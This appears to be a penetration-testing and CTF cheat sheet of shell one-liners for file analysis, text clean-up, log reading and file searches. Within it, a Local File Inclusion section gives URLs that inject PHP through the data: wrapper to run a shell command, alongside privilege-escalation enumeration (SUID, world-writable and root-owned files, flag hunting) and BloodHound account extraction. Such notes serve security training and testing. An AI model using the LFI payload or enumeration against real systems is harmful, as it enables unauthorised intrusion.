Files analysis
checksec --file myfile
file myfile
binwalk -e myfile
foremost myfile
tree output/
strings -n 10 myfile
hexedit myfile
Local File Inclusion
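Using PHP wrappers (the data: wrapper is only honoured by include when allow_url_include is enabled; it is off by default)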
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
http://10.11.0.22/menu.php?file=c:\windows\system32\drivers\etc\hosts
Write files
# File creation
echo "line1
line2
line3" >> myfile
# How many lines?
wc -l myfile
3 myfile
$ cat myfile
line1
line2
line3
cat >text<<EOF
hey
yo
EOF
cat text
hey
yo
Show line
sed -n '2271p' test1
Read file
cat etc.txt
awk '{print}' etc.txt
read files in a dir
cat directory/*.txt|less
See a line that contains
awk '/michele/' test1
grep -rni 'michele' test1 -C3
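Find lines with bytes that are not valid text in the current locale (in a UTF-8 locale this flags invalid UTF-8, not every non-ASCII character)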
grep -naxv '.*' file.txt
File clean up
Remove duplicate lines
awk '!seen[$0]++' file
lowercase everything
sed 's/.*/\L&/g' file.txt > fileNew.txt
remove duplicates
sort -u pass.txt >> clean_pass.txt
Remove blank and whitespace-only lines
grep --text -v '^[[:space:]]*$' clean_pass.txt > pass.txt
Remove words of 7 characters or fewer
egrep -xv '.{1,7}' pass.txt
Retrieve the last column
echo "Open 192.168.152.119:21" | cut -d ":" -f2 | sed ':a;N;$!ba;s/\n/,/g'
Compare files
➜ echo "A" > file1.txt
➜ echo "B" >> file1.txt
➜ echo "C" >> file1.txt
➜ echo "B" > file2.txt
➜ comm file1.txt file2.txt
A
B
C
➜ comm -12 file1.txt file2.txt
B
diff -c file1.txt file2.txt
*** file1.txt 2021-09-26 18:04:36.000000000 +0100
--- file2.txt 2021-09-26 18:04:44.000000000 +0100
***************
*** 1,3 ****
- A
B
- C
--- 1 ----
vimdiff file1.txt file2.txt
The -1 excludes lines that are only in a.txt, and the -3 excludes lines that are in both. Thus only the lines exclusively in b.txt are output (see man comm or comm --help for details). comm expects both input files to be sorted. The output is redirected to c.txt
comm -1 -3 a.txt b.txt > c.txt
If you want the difference between the two files, use diff rather than comm. e.g.
diff -u a.txt b.txt > c.txt
Find files
Find flags
find / '(' -name 'user.txt' -or -name 'root.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null
Find SUID / SGID files
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null
Find files containing an IP address
find / -type f -exec grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" {} \+ 2>/dev/null
Find files owned by the user or writable by anybody
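# List files and directories that are owned by the current user or are
# world-writable, leaving out /proc and anything under the home directory.
# $USER and $HOME are quoted so unusual values cannot split into extra
# arguments; -F makes grep treat $HOME as a literal string, not a regex.
find / '(' -type f -or -type d ')' '(' -user "$USER" -or -perm -o=w ')' 2>/dev/null | grep -v '/proc/' | grep -vF -- "$HOME" | sort -u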
Find files writable by any group of the user
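# For each group of the current user, list files and directories below the
# current directory that are group-writable by that group.
for g in $(groups); do
  # Start path given explicitly (non-GNU find requires one); -F treats $HOME as
  # a literal string when filtering out the home directory.
  find . \( -type f -or -type d \) -group "$g" -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -vF -- "$HOME"
done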
Find root owned files in /home folders
find /home -user root 2>/dev/null
Files owned by other users in folders owned by me
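# List entries not owned by the current user that sit inside directories the
# current user owns (useful when auditing ownership under shared paths).
# The directory search has to run as a command feeding the loop; written as
# bare words after `for d in`, its arguments are not executed at all.
me=$(whoami)
find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user "$me" -print0 2>/dev/null |
  while IFS= read -r -d '' d; do
    # NUL-delimited read keeps directory names with spaces or newlines intact.
    find "$d" ! -user "$me" -exec ls -l {} \; 2>/dev/null
  done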
Files owned by root, readable by me but no world readable
find / -type f -user root ! -perm -o=r 2>/dev/null
Files owned by me or world writable
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
Writable files by each group I belong to
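# For each group the current user belongs to, list files and directories that
# are group-writable by that group, skipping /proc, /sys and the home directory.
# The loop is closed by a single `done`; a second one is a syntax error.
for g in $(groups); do
  # The group name is passed as a printf argument, never as part of the format.
  printf ' Group %s:\n' "$g"
  find / '(' -type f -or -type d ')' -group "$g" -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done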
Run command on output
find ~/Downloads -type f -name 'file*' -print0 | xargs -0 ls -ail
Retrieve info in a file
head flag.txt; wc flag.txt
find . -type f -name flag.txt -print0 2>/dev/null | xargs -0 egrep '^r[a-zA-Z0-9]*0$'
Read logs
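# Requests per client IP, busiest first. Plain `sort -rn` is used on purpose:
# adding -u to a numeric sort keeps only one line per hit count, so every other
# IP with the same number of requests silently drops out of the tally.
cut -d ' ' -f 1 access.log | sort | uniq -c | sort -rn
# Unique log lines from one client that mention /admin. -F makes the dots in the
# address literal instead of any-character wildcards; it is still a substring
# match, so longer addresses starting with the same digits match as well.
grep -F '192.168.10.1' access.log | grep '/admin' | sort -u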
Copy files only (no dir)
find -maxdepth 1 -type f -exec echo cp {} newlocation/ \;
Find git folder
find . -name .git -type d
Locate all .git config in my current path
find . -name .git -type d -exec echo {}/config \;
Find excluding directories foo and bar
find /dir \( -name foo -prune \) -o \( -name bar -prune \) -o -name "*.sh" -print
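Collect grep matches for urlopen in Python files under $BASEDIR (this is a command substitution: assign it to a variable rather than running it on its own)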
$(find "$BASEDIR" -name '*.py' -exec grep -H urlopen \{\} \;)
Find by date?
find . -newermt "2016-04-16"
find /path/to/dir -newermt "Feb 07"
find /path/to/dir -newermt "yyyy-mm-dd"
Find modified files on given date
find /path/to/dir -newermt yyyy-mm-dd ! -newermt yyyy-mm-dd -ls
Print all x.pl
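# List regular files named *.pl that were modified after the given date.
# -print is the last expression: find evaluates left to right, so placing it
# before -type/-iname prints every newer entry regardless of type or name.
find /path/to/dir -newermt "yyyy-mm-dd" -type f -iname "*.pl" -print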
Cat all files
find . -type f 2>/dev/null -exec cat {} \;
Find a term in a file
find /dir \( -name node_modules -prune \) -o -name "*.sh" -exec grep --color -Hn "your text to find" {} 2>/dev/null \;
Find specific term in files
grep -rni "term" . -C3
Search php file containing term
find . -name "*.php" -type f -print0 | xargs -0 grep -H "EcrmType::class"
Windows/powershell search files
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Random
updatedb
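# -r makes locate treat the pattern as a regex, so '\.nse$' matches paths
# ending in .nse; xargs then greps those script files for "categories".
locate -r '\.nse$' | xargs grep categories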
Grep 'version\|smbb'
grep -B 5 open nmap.scan
# Retrieve samaccountname from Bloodhound data with Jq
cat 1234_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r
Actions
Delete empty folder
find . -type d -empty -delete
Find unwanted junk files
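# -name takes a single glob, not a regex: '|' is matched literally, so the
# alternatives are combined with -o inside a group instead.
find . -type f \( -name 'Thumbs.db' -o -name '.DS_Store' -o -name '*.jpeg' \)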
find . -name '.DS_Store' -type f
Move all non music files
find . -not -name '*.mp3' -not -name '*.m4a' -not -name '*.MP3' -type f -exec mv -f '{}' /Users/DIRTYFILES/. \;
Find a text and replace content
find . -type f -name "*.txt" -print0 | xargs -0 sed -i "s/replacement//g"
#sed -i 's/Database://' Database.kdbx
Create multiple folders
mkdir -p folder/{sub1,sub2}/{sub1,sub2,sub3}
intercept stdout and log to file
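# Append the contents of file to log and discard the copy tee writes to stdout.
# (The trailing backtick on the original line opened an unterminated command
# substitution.)
tee -a log < file > /dev/null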
Sum up all the lines of a file
awk '{ sum += $1 } END { print sum }' sum-me.txt